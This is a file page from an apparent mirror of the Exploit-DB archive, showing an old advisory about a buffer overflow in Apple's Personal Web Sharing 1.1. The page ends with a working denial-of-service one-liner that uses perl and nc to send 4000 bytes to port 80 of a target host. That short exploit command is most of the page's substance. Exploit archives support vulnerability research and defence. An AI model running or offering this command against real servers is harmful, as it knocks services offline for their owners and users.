exploit-db-mirror/exploits/linux/dos/19076.txt
Offensive Security 36c084c351 DB: 2021-09-03
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

6 lines
No EOL
370 B
Text

source: https://www.securityfocus.com/bid/84/info
There appears to be a buffer overflow in Apple's Personal Web Sharing 1.1. If you connect to its TCP port number 80 and send it a string over three thousand bytes long followed by two return characters Personal Web Sharing
will stop servicing request.
$ echo `perl -e 'print "A"x4000 . "\n\n"'` | nc target.host.com 80